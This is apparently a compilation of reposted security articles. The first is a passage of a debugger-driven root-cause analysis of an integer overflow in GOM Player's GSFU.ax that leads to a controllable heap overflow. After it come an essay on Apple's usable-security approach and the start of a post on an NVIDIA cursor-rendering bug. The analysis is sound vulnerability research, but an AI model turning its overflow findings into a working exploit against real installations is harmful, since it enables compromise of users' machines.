edx is shifted left by 8 bits, resulting in 0x0000AA00
ecx is added to edx, resulting in 0x0000AABB
A single byte is moved from the location pointed at by [esi+2] to ecx
edx is again shifted left by 8 bits, resulting in 0x00AABB00
ecx is again added to edx, resulting in 0x00AABBCC
A single byte is moved from the location pointed at by [esi+3] to ecx
edx is again shifted left by 8 bits, resulting in 0xAABBCC00
And finally, ecx is added to edx, resulting in 0xAABBCCDD

So what does this all mean? Well, our first 10 instructions appear to be an overly complex version of the following instruction:

movzx edx, dword ptr [esi]

However, upon closer inspection what we actually see is that due to the way bytes are stored in memory, this function is actually responsible for reversing the byte order of the input string. 
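In C, the same byte-by-byte assembly can be sketched roughly as follows. This is only a minimal illustration of the logic described above (it is not the decompiled GSFU code):

#include <stdio.h>

/* Read four consecutive bytes and combine them in big-endian order,
   mirroring the mov/shl/add sequence in the faulting block. */
unsigned int read_be32(const unsigned char *p)
{
    unsigned int v = p[0];        /* edx = first byte            */
    v = (v << 8) + p[1];          /* shl edx, 8 ; add edx, ecx   */
    v = (v << 8) + p[2];
    v = (v << 8) + p[3];
    return v;
}

int main(void)
{
    unsigned char sample[4] = { 0xAA, 0xBB, 0xCC, 0xDD };
    printf("0x%08X\n", read_be32(sample));   /* prints 0xAABBCCDD */
    return 0;
}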
So our initial read value of 0×41424344 (ABCD) will be written as 0×44434241 (DCBA). With that said, let’s reduce our block down to: loc_3B04960: cmp ebx, 4 jl short loc_3B0499D ; Jump outside of our block movzx edx, dword ptr [esi] ; Writes reverse byte order ([::-1]) mov ecx, [edi+28h] mov ecx, [ecx+10h] mov [ecx+eax*4], edx ; Exception occurs here. ; Write @edx to [ecx+eax*4] mov edx, [edi+28h] mov ecx, [edx+0Ch] add esi, 4 sub ebx, 4 inc eax cmp eax, ecx jb short loc_3B04960 Now before we actually observe our block in the debugger, there are still a few more characteristics we can enumerate. The value pointed to by esi is moved to edx edx is then written to [ecx+eax*4] The value of esi is increased by 4 The value of ebx is decreased by 4 eax is incremented by 1 The value of eax is compared against ecx. If eax is equal to ecx, exit the block. Otherwise, jump to our first instruction. Once at the beginning of our block, ebx is then compared against 0×4. If ebx is less than 4, exit the block. Otherwise, perform our loop again. To summarize, our first instruction attempts to determine if ebx is less than or equal to 4. If it is not, we begin our loop by moving a 32 bit value at memory location “A” and write it to memory location “B”. Then we check to make sure eax is not equal to ecx. If it isn’t, then we return to the beginning of our loop. This process will continue, performing a block move of our data until one of our 2 conditions are met. With a rough understanding of the instruction set, let’s observe its behavior in our debugger. We’ll set the following breakpoints which will halt execution if either of our conditions cause our block iteration to exit and inform us of what data is being written and to where. r @$t0 = 1 bp GSFU!DllUnregisterServer+0x23680 ".printf \"Block iteration #%p\\n\", @$t0; r @$t0 = @$t0 + 1; .if (@ebx <= 0x4) {.printf \"1st condition is true. Exiting block iteration\\n\"; } .else {.printf \"1st condition is false (@ebx == 0x%p). Performing iteration\\n\", @ebx; gc}" bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4); gc" bp GSFU!DllUnregisterServer+0x236b9 ".if (@eax == @ecx) {.printf \"2nd is false. Exiting block iteration.\\n\\n\"; } .else {.printf \"2nd condition is true. ((@eax == 0x%p) <= (@ecx == 0x%p)). Performing iteration\\n\\n\", @eax, @ecx; gc}" With our breakpoints set, you should see something similar to the following: Block iteration #00000001 1st condition is false (@ebx == 0x000000ec). Performing iteration The value, 0x000094b5, is taken from 0x07009f14 and written to 0x0700df60 2nd condition is true. ((@eax == 0x00000001) <= (@ecx == 0x80000027)). Performing iteration Block iteration #00000002 1st condition is false (@ebx == 0x000000e8). Performing iteration The value, 0x000052d4, is taken from 0x07009f18 and written to 0x0700df64 2nd condition is true. ((@eax == 0x00000002) <= (@ecx == 0x80000027)). Performing iteration ...truncated... Block iteration #00000028 1st condition is false (@ebx == 0x00000050). Performing iteration The value, 0x00004fac, is taken from 0x07009fb0 and written to 0x0700dffc 2nd condition is true. ((@eax == 0x00000028) <= (@ecx == 0x80000027)). Performing iteration Block iteration #00000029 1st condition is false (@ebx == 0x0000004c). 
Performing iteration The value, 0x00004f44, is taken from 0x07009fb4 and written to 0x0700e000 (1974.1908): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000028 ebx=0000004c ecx=0700df60 edx=00004f44 esi=07009fb4 edi=07007fb8 eip=06e64989 esp=0012bdb4 ebp=07009f00 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 GSFU!DllUnregisterServer+0x236a9: 06e64989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:0700e000=???????? Here we can see that neither of our conditions caused our block iteration to exit. Our instruction block performed 0×29 writes until a memory boundary was reached (likely caused by our full page heap verification) which triggers an access violation. Using the ‘db’ command, we let’s take a look at the data we’ve written. 0:000> db 0x0700df60 0700df60 b5 94 00 00 d4 52 00 00-a8 52 00 00 2c 52 00 00 .....R...R..,R.. 0700df70 7c 52 00 00 80 52 00 00-a4 52 00 00 28 53 00 00 |R...R...R..(S.. 0700df80 18 53 00 00 94 52 00 00-20 53 00 00 ac 52 00 00 .S...R.. S...R.. 0700df90 28 53 00 00 e0 51 00 00-d0 52 00 00 88 52 00 00 (S...Q...R...R.. 0700dfa0 e0 52 00 00 94 52 00 00-18 53 00 00 14 52 00 00 .R...R...S...R.. 0700dfb0 14 52 00 00 5c 52 00 00-34 52 00 00 08 52 00 00 .R..\R..4R...R.. 0700dfc0 d4 51 00 00 84 51 00 00-d8 51 00 00 d8 50 00 00 .Q...Q...Q...P.. 0700dfd0 3c 51 00 00 04 52 00 00-a4 51 00 00 bc 50 00 00 <q...r...q...p.. Now let’s break down the information returned by our breakpoints: First, taking a look at our write instructions we can see that the data being written appears to be the contents of our “Sample Size Table”. Our vulnerable block is responsible for reading 32 bits during each iteration from a region of memory beginning at 0x07009F14 and writing it to a region beginning at 0x0700DF60 (these addresses may be different for you and will likely change after each execution). This is good a good sign as it means that we can control what data is being written. Furthermore, we can see that during our second condition, eax is being compared against the same value being provided as the “Number of Entries” element within our “stsz” atom. This means that we can control at least 1 of the 2 conditions which will determine how many times our write instruction occurs. This is good. As with our previous example (KMPlayer), we demonstrated that if we can write beyond the intended boundary of our function, we may be able to overwrite sensitive data. As for our first condition, it’s not yet apparent where the value stored in ebx is derived. More on this in a bit. At this point, things are looking pretty good. So far we’ve determined that we can control the data we write and at least one of our conditions. However, we still haven’t figured out yet why we’re writing beyond our boundary and into the guard page. In order to determine this, we’ll need to enumerate some information regarding the region where our data is being written, such as the size and type (whether it be stack, heap, or virtually allocated memory). To do so, we can use corelan0cd3r’s mona extension for WinDbg. Before we do however, we’ll need to modify Gflags to only enable standard page heap verification. The reason for this is that when using full page heap verification, Gflags will modify our memory layout in such a way that will not accurately reflect our memory state when run without GFlags. 
To enable standard page heap verification, we’ll execute the following command: gflags.exe /p /enable gom.exe Next, let’s go ahead and start our process under WinDbg. This time, we’ll only apply 1 breakpoint in order to halt execution upon execution of our first write instruction. 0:000> bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4)" Bp expression 'GSFU!DllUnregisterServer+0x236a9' could not be resolved, adding deferred bp 0:000> g The value, 0x000094b5, is taken from 0x06209c4c and written to 0x06209dc0 eax=00000000 ebx=000000ec ecx=06209dc0 edx=000094b5 esi=06209c4c edi=06209bb8 eip=06034989 esp=0012bdb4 ebp=06209c38 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 GSFU!DllUnregisterServer+0x236a9: 06034989 891481 mov dword ptr [ecx+eax*4],edx ds:0023:06209dc0=00000000 0:000> !py mona info -a 0x06209dc0 Hold on... [+] Generating module info table, hang on... - Processing modules - Done. Let's rock 'n roll. [+] NtGlobalFlag: 0x02000000 0x02000000 : +hpa - Enable Page Heap [+] Information about address 0x06209dc0 {PAGE_READWRITE} Address is part of page 0x06200000 - 0x0620a000 This address resides in the heap Address 0x06209dc0 found in _HEAP @ 06200000, Segment @ 06200680 ( bytes ) (bytes) HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state 06209d98 000000d8 00000050 00000014 [03] 06209dc0 000000a4 0000000c Extra present,Busy (hex) 00000216 00000080 00000020 00000164 00000012 Extra present,Busy (dec) Chunk header size: 0x8 (8) Extra header due to GFlags: 0x20 (32) bytes DPH_BLOCK_INFORMATION Header size: 0x20 (32) StartStamp : 0xabcdaaaa Heap : 0x86101000 RequestedSize : 0x0000009c ActualSize : 0x000000c4 TraceIndex : 0x0000193e StackTrace : 0x04e32364 EndStamp : 0xdcbaaaaa Size initial allocation request: 0xa4 (164) Total space for data: 0xb0 (176) Delta between initial size and total space for data: 0xc (12) Data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... [+] Disassembly: Instruction at 06209dc0 : ADD BYTE PTR [EAX],AL Output of !address 0x06209dc0: Usage: <unclassified> Allocation Base: 06200000 Base Address: 06200000 End Address: 0620a000 Region Size: 0000a000 Type: 00020000.MEM_PRIVATE State: 00001000.MEM_COMMIT Protect: 00000004.PAGE_READWRITE Good. So here we can see that we’re writing to an allocated heap chunk. The requested size of our block is 0x9C. Based on our access violation, we can already determine that the current state of our mutated file will attempt to write more than 0x9C bytes of data. After 0x9C bytes, our boundary is reached and an access violation is triggered. Considering the structure in which we’re writing our data, it appears as if we’ve identified a very simple example of a heap overflow. If we are able to control the length of the data being written and another heap chunk sits in a location following our written data, we may be able to write beyond the bounds of our chunk and corrupt the metadata (chunk header) of the following chunk, or application data stored in that adjacent chunk (that is of course with GFlags disabled). More on this later. However, before we attempt to do so, we still have not determined the actual cause of our exception. Why is it that we are allocating a region that is only 0x9C bytes, yet attempting to write significantly more? Our next step in the process will be to determine where our allocated size of 0x9C comes from. 
Is this some value specified in the file? There are in fact several methods we could use to determine this. We could set a breakpoint on all heap allocations of size 0x9C. Once we've identified the appropriate allocation, we can then look into the calling function in order to determine where the size is derived. Fortunately for us, with GFlags enabled, that is unnecessary. As I mentioned earlier, when page heap verification is enabled, a field within the page heap header contains a pointer to the stack trace of our allocated block. A pointer to this stack trace is listed in !mona's output under the DPH_BLOCK_INFORMATION table (highlighted above). This allows us to see which functions were called just prior to our allocation. This information can also be obtained without !mona by using the !heap command while supplying an address within the heap chunk:

!heap -p -a 0x06209dc0

You can also retrieve this information using the 'dt' command and the address of the chunk's "StartStamp":

dt _DPH_BLOCK_INFORMATION 0x06209da0

With that said, let's use the 'dds' command to display the stack trace of the allocated chunk.

0:000> dds 0x04e32364
04e32364 abcdaaaa
04e32368 00000001
04e3236c 00000004
04e32370 00000001
04e32374 0000009c
04e32378 06101000
04e3237c 04fbeef8
04e32380 04e32384
04e32384 7c94b244 ntdll!RtlAllocateHeapSlowly+0x44
04e32388 7c919c0c ntdll!RtlAllocateHeap+0xe64
04e3238c 0609c2af GSFU!DllGetClassObject+0x29f8f
04e32390 06034941 GSFU!DllUnregisterServer+0x23661

Here we can see two GOM functions (GSFU!DllUnregisterServer and GSFU!DllGetClassObject) are called prior to the allocation. First, let's take a quick glance at the function just prior to our call to ntdll!RtlAllocateHeap using IDA Pro. So as we would expect, here we can see a call to HeapAlloc. The value being provided as dwBytes would be 0x9C (our requested size). It's important to note here that IDA Pro, unlike WinDbg, has the ability to enumerate functions such as this. When it identifies a call to a known function, it will automatically apply comments in order to identify known variables supplied to that function. In the case of HeapAlloc (ntdll!RtlAllocateHeap), it accepts 3 arguments: dwBytes (size of the allocation), dwFlags, and hHeap (a pointer to the owning heap). More information on this function can be found at the MSDN page here. Now, in order to identify where the value of dwBytes is introduced, let's go ahead and take a quick look at the previous function (GSFU!DllUnregisterServer+0x23661) in our stack trace. Interesting. Here we can see that a call to the Calloc function is made, which in turn calls HeapAlloc. Before we continue, we need to have a short discussion about Calloc. Calloc is a function used to allocate a contiguous block of memory for an array. It accepts two arguments:

size_t num ; Number of Objects
size_t size ; Size of Objects

It will allocate a region of memory using a size derived by multiplying both arguments (Number of Objects * Size of Objects). Then, by calling memset, it will zero initialize the array (not really important for the purpose of this article). What is important to note, however, is that rather than using the CRT version of Calloc (msvcrt!calloc), an internal implementation is used. We can see this by following the call (the code is included in the GSFU module rather than making an external call to msvcrt). The importance of this will become clear very soon. You can easily follow any call in IDA Pro by simply clicking on the called function. 
In this case, clicking on “_calloc” will bring us to our inlined function. We can determine that the function has been inlined as GSFU.ax is our only loaded module. A jump to the msvcrt!calloc function would be displayed by an “extrn”, or external, data reference (DREF). Now, with a quick look at our two calling functions, let’s go ahead and set a one time breakpoint on the first value being supplied to Calloc so that once it is hit, another breakpoint is applied to ntdll!RtlAllocateHeap. Then, we’ll trace until ntdll!RtlAllocateHeap is hit. Let’s go ahead and apply the following breakpoint, and then tell the process to continue running (g) 0:000> bp GSFU!DllUnregisterServer+0x23653 /1 "bp ntdll!RtlAllocateHeap; ta" Bp expression 'GSFU!DllUnregisterServer+0x23653 /1' could not be resolved, adding deferred bp 0:000> g eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23653 06034933 52 push edx ; Number of Elements eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23654: 06034934 6a04 push 4 ; Size of Elements eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8 eip=06034936 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 GSFU!DllUnregisterServer+0x23656: 06034936 83c604 add esi,4 eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8 eip=06034939 esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 GSFU!DllUnregisterServer+0x23659: 06034939 83eb0c sub ebx,0Ch eax=050d9d70 ebx=000000ec ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8 eip=0603493c esp=0012bdac ebp=050d9c38 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212 GSFU!DllUnregisterServer+0x2365c: 0603493c e8e6780600 call GSFU!DllGetClassObject+0x29f07 (0609c227) ; Calloc ...truncated... eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8 eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 GSFU!DllGetClassObject+0x29f16: 05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027 eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=050d9bb8 eip=05d5c23a esp=0012bd78 ebp=0012bda4 iopl=0 ov up ei pl nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200a07 GSFU!DllGetClassObject+0x29f1a: 05d5c23a 8975e0 mov dword ptr [ebp-20h],esi ss:0023:0012bd84=0012d690 ...truncated... 
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a0 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f80: 05d5c2a0 56 push esi ; Allocation Size eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a1 esp=0012bd74 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f81: 05d5c2a1 6a08 push 8 ; Flags eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a3 esp=0012bd70 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f83: 05d5c2a3 ff35a0cada05 push dword ptr [GSFU!DllGetClassObject+0x7a780 (05dacaa0)] ds:0023:05dacaa0=05dc0000 ; HeapHandle eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=05d5c2a9 esp=0012bd6c ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 GSFU!DllGetClassObject+0x29f89: 05d5c2a9 ff15ece0d605 call dword ptr [GSFU!DllGetClassObject+0x3bdcc (05d6e0ec)] ds:0023:05d6e0ec={ntdll!RtlAllocateHeap (7c9100c4)} Breakpoint 1 hit eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000 eip=7c9100c4 esp=0012bd68 ebp=0012bda4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246 ntdll!RtlAllocateHeap: 7c9100c4 6804020000 push 204h When analyzing operations like this, I typically find it best to start from the bottom up. Since we already know that our requested allocation size is 0x9C, we can begin at the point where the value 0x9C is provided as the dwBytes argument for ntdll!RtlAllocateHeap (GSFU!DllGetClassObject+0x29f80). The next thing we need to do is look for the instruction, prior to our push instruction, that either introduces the value 0x9C to esi or modifies it. Looking back a few lines, we see this instruction: eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8 eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206 GSFU!DllGetClassObject+0x29f16: 05d5c236 0faf750c imul esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027 Interesting. It appears that we’re performing signed multiplication of the value contained in esi (0×4) and our “Number of Entries” element within the “stsz” atom (as pointed to by our stack entry located at 0x0012bdb0). This makes sense since Calloc, as we had previously discussed, will perform an allocation of data with a size of (Number of Elements * Size of Elements). However, there seems to be a problem with our math. When multiplying 0×80000027 * 0×4, our result should be 0x20000009C rather than 0x0000009C. The reason for this is that we’re attempting to store a value larger than what our 32 bit register can hold. When doing so, an integer overflow occurs and our result is “wrapped,” causing only the 32 least significant bits to be stored in our register. With this, we can control the size of our allocations by manipulating the value contained within our “Number of Entries” element. By allocating a chunk smaller than the data we intend to write, we can trigger a heap overflow. However, the root cause of our issue is not exactly as clear as it may seem. 
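As a quick sanity check of the arithmetic above, the wrap can be reproduced with a couple of lines of C (values taken from the analysis; this is only an illustration of 32-bit unsigned multiplication, not application code):

#include <stdio.h>

int main(void)
{
    unsigned int entries = 0x80000027;      /* "Number of Entries" from the stsz atom */
    unsigned int element_size = 4;          /* size of each sample size table entry   */
    unsigned int alloc_size = entries * element_size;  /* product wraps modulo 2^32   */

    printf("0x%08X\n", alloc_size);         /* prints 0x0000009C */
    return 0;
}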
When we looked at our function in IDA Pro earlier, we determined that rather than using the CRT version of calloc (msvcrt!calloc), GOM used a wrapped version instead. Had the actual Calloc function been used, this vulnerability would not exist. To explain this, let's take a look at the code snippet below:

#include <stdio.h>
#include <malloc.h>

int main( void )
{
    int size = 0x4;          // Size of Element
    int num = 0x80000027;    // Number of Elements
    int *buffer;

    printf( "Attempting to allocate a buffer with size: 0x20000009C\n" );
    buffer = (int *)calloc( size, num );   // Size of Element * Number of Elements
    if( buffer != NULL )
        printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) );
    else
        printf( "Failed to allocate buffer.\n" );
    free( buffer );
}

The example above demonstrates a valid (albeit not the best) use of Calloc. Here we're trying to allocate an array with a size of 0x20000009C (0x4 * 0x80000027). Let's see what would happen if we were to compile and run this code:

Attempting to allocate a buffer with size: 0x20000009C
Failed to allocate buffer.

Interesting. Calloc will fail to allocate a buffer due to checks intended to detect wrapped values. Under Windows XP SP3, this functionality can be seen in the following 2 instructions.

eax=ffffffe0 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee
eip=77c2c0dd esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
msvcrt!calloc+0x1a:
77c2c0dd f7f1 div eax,ecx

eax=3ffffff8 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee
eip=77c2c0df esp=0022ff1c ebp=0022ff48 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
msvcrt!calloc+0x1c:
77c2c0df 3b450c cmp eax,dword ptr [ebp+0Ch] ss:0023:0022ff54=80000027

Here we can see that the (near) maximum value for a 32 bit register (0xFFFFFFE0) is divided by our first argument supplied to Calloc. The result is then compared against the second value supplied to Calloc. If the second value is larger, Calloc is able to determine that an integer overflow will occur and exit. However, the _Calloc function found in the GSFU module, unlike msvcrt!calloc, does not contain this check. Take a look at the following example:

#include <stdio.h>
#include <malloc.h>

int _calloc( size_t num, size_t size )
{
    size_t total = num * size;   // Integer overflow occurs here
    return (total);
}

int main( void )
{
    int size = 4;                // Size of Element
    int num = 0x80000027;        // Number of Elements
    int *buffer;

    int chunk_size = _calloc( size, num );
    printf( "Attempting to allocate a buffer with size: 0x%X\n", chunk_size );

    buffer = (int *)malloc(chunk_size);
    if( buffer != NULL )
        printf( "Allocated buffer with size (0x%X)\n", _msize(buffer) );
    else
        printf( "Failed to allocate buffer.\n" );
    free( buffer );
}

Here we can see that instead of using the actual calloc function, we're multiplying our two values ("Element Size" and "Number of Elements") and storing the result in a variable called "chunk_size". That value is then supplied as the size argument to malloc. Using the values from our mutated seed, let's take a look at our sample program's output:

Attempting to allocate a buffer with size: 0x9C
Allocated buffer with size (0x9C)

As we expected, the application readily accepts our wrapped value (0x9C) and provides this as the size argument being supplied to malloc. This in turn will cause our buffer to be undersized, allowing our heap overflow to occur. 
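For completeness, a defensive version of the wrapped allocation helper is easy to sketch. The snippet below is only an illustration of the kind of check GSFU's inlined _calloc is missing; it is not GOM's code, and it uses UINT32_MAX rather than the 0xFFFFFFE0 constant seen in the msvcrt!calloc disassembly above:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Refuse the allocation if num * size cannot be represented in 32 bits. */
static void *checked_calloc32(uint32_t num, uint32_t size)
{
    if (size != 0 && num > UINT32_MAX / size)
        return NULL;                     /* multiplication would wrap */
    return calloc(num, size);
}

int main(void)
{
    void *p = checked_calloc32(0x80000027, 4);   /* the values from the mutated seed */
    printf(p ? "allocated\n" : "refused: size would wrap\n");
    free(p);
    return 0;
}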
ARTICOL COMPLET: https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/
18. Apple's security strategy: make it invisible
Rich Mogull @rmogull

When I received an invitation to the keynote event at Apple's Worldwide Developers Conference, my first reaction was, "Why?" I'm known as a security guy, which means my keynote invites usually come only when major security features are released. But as I watched the presentations, I began to understand why. Among the many new features in iOS and OS X that the company discussed, two security-related ones received extended attention: iCloud Keychain and Activation Lock. And as I thought about the demos of those and other new features in the days that followed, I came to realize something about the company's approach to security that I hadn't thought about before.

The human factor

Apple is famously focused on design and human experience as its top guiding principles. When it comes to security, that focus created a conundrum. Security is all about placing obstacles in the way of attackers, but (despite the claims of security vendors) those same obstacles can get in the way of users, too. For many years, Apple tended to choose good user experience at the expense of leaving users vulnerable to security risks. Take passwords, for example: As essential as they are to protecting us and our devices, they are one of the most universally despised things about using technology. (I've ranted about passwords elsewhere.) That strategy worked for a long time, in part because Apple's comparatively low market share made its products less attractive targets. But as Apple products began to gain in popularity, many of us in the security business wondered how Apple would adjust its security strategies to its new position in the spotlight. As it turns out, the company not only handled that change smoothly, it has embraced it. Despite a rocky start, Apple now applies its impressive design sensibilities to security, playing the game its own way and in the process changing our expectations for security and technology.

Pragmatic design

While Apple hasn't said so explicitly, it's clear that one key principle guides them when it comes to security: The more you impede a user's ability to do something, the more likely that user is to circumvent security measures. There were three good examples in the company's WWDC keynote:

iCloud Keychain: When Apple first announced iCloud Keychain, I was initially perplexed. Why add a password manager to the operating system and default browser when there are plenty of third-party applications that do this, and it isn't among the features users are screaming for? Then I realized that Apple was tackling a real-world security issue by trying to make that issue simply go away for the average user. Apple certainly can't stop the onslaught of phishing attacks. But it can add a built-in, cloud-based password manager that both reduces security risks and improves the user experience. That addition enables users to use complex, site-specific passwords, and those passwords will—with no user effort—synchronize across all of their devices and be available whenever they're needed (assuming those users use Apple products only, of course). 
With the deep browser integration demonstrated at WWDC, it appears users won’t have to manage plugins or even click extra buttons to decide when they need to use the tool; it seems to pop up exactly when they need it, making it easier to use a Keychain-created password than manually enter one. That’s applying human design principles to solve a security problem and improve the overall user experience. No extra software to install, No plugins to manage. No buttons to remember to click. iCloud Keychain might not be good enough for power users, but it will bring the power of password management to the masses. Activation Lock Activation Lock: The theft of iDevices is rampant throughout the world. While we might blame Apple for producing such desirable products, the company clearly doesn’t want people to have to hide their devices in fake Blackberry cases to use them in public without fear. Phone carriers could dramatically reduce theft by refusing to activate stolen phones (every cellular enabled device has a unique hardware ID), but so far they have been slow to act. Even if domestic carriers did create a registry, it’s unlikely all foreign carriers would and bad guys would simply ship phones overseas. Activation Lock takes that decision out of carriers’ hands and instead applies a global solution. Barring new hacking techniques, phones tied to iCloud accounts will be unusable once stolen. Users don’t really need to do anything other than possess a free iCloud account. There’s no carrier lock-in, registration, paperwork, or other obstacles to using it. The feature has the potential to reduce device theft at no additional cost to consumers. So, once again, Apple is tackling a real-world problem without sacrificing the user experience. (Only time will tell how effective it is). Gatekeeper and the Mac App Store—As I’ve written previously, Gatekeeper combines sandboxing, the Mac App Store, and code-signing to dramatically reduce the chance a user can be tricked into installing malware. This is based on the success of the extreme sandboxing and reliance on the App Store for iOS that has prevented widespread malware from ever appearing on the iOS platform. Again, Apple addressed the user side of the problem. It didn’t rely on deep security technologies that targets could be tricked into circumventing. Rather, by pushing users to rely on applications from the Mac App Store and by providing strong incentives (like easier updates and no additional cost per computer), the company reduced the need to manually download apps from different locations. Apple then added Gatekeeper so users wouldn’t accidentally install applications from untrusted sources. This approach attacks the economics of malware while minimally impacting the user experience. A large percentage of users never need to think about where their software comes from or worry about being tricked into installing something bad. Invisible and practical You’ll see evidence of this same approach elsewhere in the Apple ecosystem. With FileVault 2, Apple provided full disk encryption for users to protect lost laptops. But at the same time, the technology allows users to safely and freely recover their system if they accidentally lock themselves out (without giving the NSA a back door). XProtect provides invisible, basic antimalware protection to all Macs, without the intrusiveness or cost normally associated with antivirus tools. 
Java in the browser is automatically disabled unless a user explicitly needs it; this introduces a small hurdle, while again minimizing the biggest attack path against current Macs. iOS will soon strongly encrypt all app data, while continuing the tight app isolation that effectively eliminates most forms of attack. These tight controls might frustrate some advanced technology users, and certainly frustrate security vendors. But they also provide a safe user experience that's proven itself effective over the past five years. The consistent thread through all these advances is Apple attempting, wherever possible, to use security to improve the user experience and make common security problems simply go away. By focusing so much on design, Apple increases the odds users will adopt these technologies and, so, stay safer. Sursa: Apple's security strategy: make it invisible | Macworld
  19. [h=2]Changing the cursor shape in Windows proven difficult by NVIDIA (and AMD)[/h] If you work in the software engineering or information security field, you should be familiar with all sorts of software bugs – the functional and logical ones, those found during the development and internal testing along with those found and reported by a number of complaining users, those that manifest themselves in the form of occassional, minor glitches in your system’s logic and those that can lose your company 440 million US dollars in 30 minutes; not to mention bugs which can enable attackers to remotely execute arbitrary code on your computer without you even realizing it. While the latter type of issues is usually of most interest to security professionals and 0-day brokers (not all developers, though) and thus the primary subject of this blog, this post is about something else – the investigation of a non-security (and hardly functional) bug I originally suspected win32k.sys for, but eventually discovered it was a problem in the NVIDIA graphics card device drivers. Figure 1. My typical work window order, with vim present in the background. To give you some background, I am a passionate user of vim for Windows (gvim, specifically). When working with code, my usual set up for one of the monitors is a black-themed vim window set for full-screen, sometimes with other smaller windows on top when coding happens to be preempted with some other tasks. The configuration is illustrated in Figure 1 in a slightly smaller scale. A few weeks ago, I noticed that moving the mouse cursor from the vim window over the border of the foreground window (Process Explorer in the example) and inside it, the cursor would be occassionally rendered with colorful artifacts while changing the shape. Interestingly, these artifacts would only show up for a fraction of second and only during one in a hundred (loose estimate) hovers from vim to another window. Due to the fact that the condition was so rare, difficult to reproduce manually and hardly noticeable even when it occured, I simply ignored it at the time, swamped with work more important than some random pixels rendered for a few milliseconds once or twice a day. Once I eventually found some spare time last week, I decided to thoroughly investigate the issue and find out the root cause of this weird behavior. I was primarily motivated by the fact that colorful artifacts appearing on the display could indicate unintended memory being rendered by the system, with the potential of pixels representing uninitialized kernel memory (thus making it a peculiar type of information disclosure vulnerability). Both me and Gynvael have found similar issues in the handling of image file formats by popular web browsers in the past, so the perspective of disclosing random kernel bytes seemed tempting and not too far off. 